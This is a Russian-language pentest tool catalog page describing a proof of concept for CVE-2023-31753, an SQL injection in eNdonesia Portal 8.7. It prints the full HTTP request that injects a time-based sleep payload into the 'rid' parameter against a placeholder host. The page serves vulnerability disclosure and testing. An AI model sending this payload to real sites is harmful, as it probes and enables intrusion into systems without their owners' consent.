Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-31753 — Proof of Concept for CVE-2023-31753 - eNdonesia Portal 8.7 | Kitploit
Инструменты/GitHubGitHub/kil0byt3x/cve-2023-31753
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubkil0byt3x/cve-2023-31753

CVE-2023-31753

Proof of Concept for CVE-2023-31753 - eNdonesia Portal 8.7

Репозиторий
23 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Доказательство концепции для CVE-2023-31753

Описание: Уязвимость SQL-инъекции была обнаружена в eNdonesia Portal v8.7, которая эксплуатируется при вставке специально подготовленной полезной нагрузки в параметр "rid" в diskusi.php.

  • Название эксплойта: eNdonesia Portal 8.7 - Уязвимость SQL-инъекции в diskusi.php (параметр rid)
  • Дата: 19 мая 2023 г.
  • Автор эксплойта: Kunal Khubchandani
  • Домашняя страница вендора: http://www.endonesia.org/
  • Ссылка на ПО: https://sourceforge.net/projects/endonesia/
  • Версия: 8.7
  • Категория: Webapps
  • Протестировано на: WiN11_x64/KaLiLinuX_x64
  • CVE : CVE-2023-31753

#Доказательство концепции:

  1. Чтобы использовать эту уязвимость, необходимо отправить SQLi sleep-полезную нагрузку в качестве значения GET-параметра "rid" в следующем HTTP-запросе.

  2. Уязвимый запрос:

GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=(select*from(select(sleep(20)))a) HTTP/1.1
Host: TARGET
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Connection: close
Cache-Control: max-age=0

  1. При отправке вышеуказанного HTTP-запроса через Burp Suite пользователь получит ответ с задержкой в 20 секунд.

** Задержка в 20 секунд:

image

** Задержка в 30 секунд:

image

Скачать инструмент